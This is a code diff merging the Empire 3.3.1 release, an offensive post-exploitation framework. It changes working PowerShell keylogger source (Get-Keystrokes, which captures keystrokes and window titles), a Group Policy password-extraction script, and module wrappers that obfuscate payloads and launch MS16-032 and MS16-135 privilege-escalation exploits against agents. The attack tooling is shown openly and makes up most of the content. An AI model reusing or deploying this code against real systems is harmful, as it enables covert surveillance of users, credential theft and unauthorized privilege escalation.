Merge pull request #262 from BC-SECURITY/dev

Empire 3.3.1 Release

VERSION

@@ -1 +1 @@
-3.3.0
+3.3.1

changelog

@@ -1,3 +1,11 @@
+7/20/2020
+------------
+- Version 3.3.1 Master Release
+	- Updated Mimikatz to 20200715 NPLogonNotify passwords - #260 (@Cx01N)
+	- Fixed syntax errors in Get-GPPPassword and MS16-135 - #259 (@PaulWhitingS2)
+	- Fixed missing keylogger character issue - #252 (@Cx01N)
+	- Fixed missing agentPSversion variable - #262 (@Cx01N)
+
 7/10/2020
 ------------
 - Version 3.3.0 Master Release

data/module_source/collection/Get-Keystrokes.ps1

@@ -1,21 +1,27 @@
 function Get-Keystrokes {
 <#
 .SYNOPSIS
- 
+
     Logs keys pressed, time and the active window (when changed).
     Some modifications for Empire by @harmj0y.
-    
+
     PowerSploit Function: Get-Keystrokes
     Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
     Modifications: @harmj0y
     License: BSD 3-Clause
     Required Dependencies: None
     Optional Dependencies: None
-    
+
 .LINK
     http://www.obscuresec.com/
     http://www.exploit-monday.com/
 #>
+    param
+    (
+        [Parameter(Mandatory = $False)]
+        [string]
+        $Sleep = 1
+    )
 
     [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null
 
@@ -107,14 +113,14 @@ function Get-Keystrokes {
     $LastWindowTitle = ""
 
     while ($true) {
-        Start-Sleep -Milliseconds 40
+        Start-Sleep -Milliseconds $Sleep
         $gotit = ""
         $Outout = ""
-        
+
         for ($char = 1; $char -le 254; $char++) {
             $vkey = $char
             $gotit = $ImportDll::GetAsyncKeyState($vkey)
-            
+
             if ($gotit -eq -32767) {
 
                 #check for keys not mapped by virtual keyboard
@@ -155,19 +161,21 @@ function Get-Keystrokes {
                 if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}
 
                 $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
-                
+
                 $kbstate = New-Object Byte[] 256
                 $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
-                
+
                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
                 $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
 
-                #get the title of the foreground window
-                $TopWindow = $ImportDll::GetForegroundWindow()
-                $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
-
                 if ($unicode_res -gt 0) {
-                    if ($WindowTitle -ne $LastWindowTitle){
+                    #get the title of the foreground window
+                    $TopWindow = $ImportDll::GetForegroundWindow()
+
+                    if ($TopWindow -ne $LastTopWindow){
+                        $LastTopWindow = $TopWindow
+                        $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
+
                         # if the window has changed
                         $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                         $Outout = "`n`n$WindowTitle - $TimeStamp`n"
@@ -179,4 +187,4 @@ function Get-Keystrokes {
             }
         }
     }
-}
+}

data/module_source/privesc/Get-GPPPassword.ps1

@@ -149,11 +149,11 @@ function Get-GPPPassword
 
                     'Scheduledtasks.xml' {
                         $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-+                       $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-+                       $UserName += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $UserName += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                         $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
-+                       $Changed += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
+                        $Changed += , $Xml | Select-Xml "/ScheduledTasks/TaskV2/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
                     }
 
                     'DataSources.xml' { 

lib/common/empire.py

@@ -15,7 +15,7 @@
 from builtins import range
 from builtins import str
 
-VERSION = "3.3.0 BC-Security Fork"
+VERSION = "3.3.1 BC-Security Fork"
 
 from pydispatch import dispatcher
 
@@ -4049,11 +4049,11 @@ def validate_options(self, prompt):
                 # if we're running this module for all agents, skip this validation
                 if sessionID.lower() != "all" and sessionID.lower() != "autorun":
                     moduleLangVersion = float(self.module.info['MinLanguageVersion'])
-                    agentLangVersion = float(self.mainMenu.agents.get_language_version_db(sessionID))
+                    agent_lang_version = float(self.mainMenu.agents.get_language_version_db(sessionID))
 
                     # check if the agent/module PowerShell versions are compatible
-                    if moduleLangVersion > agentLangVersion:
-                        print(helpers.color("[!] Error: module requires language version %s but agent running version %s" % (moduleLangVersion, agentPSVersion)))
+                    if moduleLangVersion > agent_lang_version:
+                        print(helpers.color("[!] Error: module requires language version %s but agent running version %s" % (moduleLangVersion, agent_lang_version)))
                         return False
             except Exception as e:
                 print(helpers.color("[!] Invalid module or agent language version: %s" % (e)))

lib/modules/powershell/collection/keylogger.py

@@ -15,24 +15,25 @@ def __init__(self, mainMenu, params=[]):
 
             'Author': ['@obscuresec', '@mattifestation', '@harmj0y'],
 
-            'Description': ('Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),
+            'Description': (
+                'Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),
 
             'Software': '',
 
             'Techniques': ['T1056'],
 
-            'Background' : True,
+            'Background': True,
 
-            'OutputExtension' : None,
-
-            'NeedsAdmin' : False,
+            'OutputExtension': None,
 
-            'OpsecSafe' : True,
+            'NeedsAdmin': False,
 
-            'Language' : 'powershell',
+            'OpsecSafe': True,
+
+            'Language': 'powershell',
+
+            'MinLanguageVersion': '2',
 
-            'MinLanguageVersion' : '2',
-
             'Comments': [
                 'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'
             ]
@@ -42,10 +43,15 @@ def __init__(self, mainMenu, params=[]):
         self.options = {
             # format:
             #   value_name : {description, required, default_value}
-            'Agent' : {
-                'Description'   :   'Agent to run module on.',
-                'Required'      :   True,
-                'Value'         :   ''
+            'Agent': {
+                'Description': 'Agent to run module on.',
+                'Required': True,
+                'Value': ''
+            },
+            'Sleep': {
+                'Description': 'Sleep time [ms] between key presses. Shorter times may increase CPU usage on the target.',
+                'Required': False,
+                'Value': '1'
             }
         }
 
@@ -59,7 +65,6 @@ def __init__(self, mainMenu, params=[]):
             if option in self.options:
                 self.options[option]['Value'] = value
 
-
     def generate(self, obfuscate=False, obfuscationCommand=""):
 
         # read in the common module source code
@@ -78,7 +83,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
 
         scriptEnd = "Get-Keystrokes "
 
-        for option,values in self.options.items():
+        for option, values in self.options.items():
             if option.lower() != "agent":
                 if values['Value'] and values['Value'] != '':
                     if values['Value'].lower() == "true":
@@ -88,7 +93,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
                         scriptEnd += " -" + str(option) + " " + str(values['Value'])
 
         if obfuscate:
-            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd,
+                                          obfuscationCommand=obfuscationCommand)
         script += scriptEnd
         script = helpers.keyword_obfuscation(script)
 

lib/modules/powershell/privesc/ms16-032.py

@@ -110,7 +110,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
         launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
 
         scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"'
-        scriptEnd += ';`nInvoke-MS16032 completed.'
+        scriptEnd += ';"`nInvoke-MS16032 completed."'
 
         if obfuscate:
             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)

lib/modules/powershell/privesc/ms16-135.py

@@ -111,7 +111,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
         launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
 
         script += 'Invoke-MS16135 -Command "' + launcherCode + '"'
-        script += ';`nInvoke-MS16135 completed.'
+        script += ';"`nInvoke-MS16135 completed."'
 
         if obfuscate:
             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)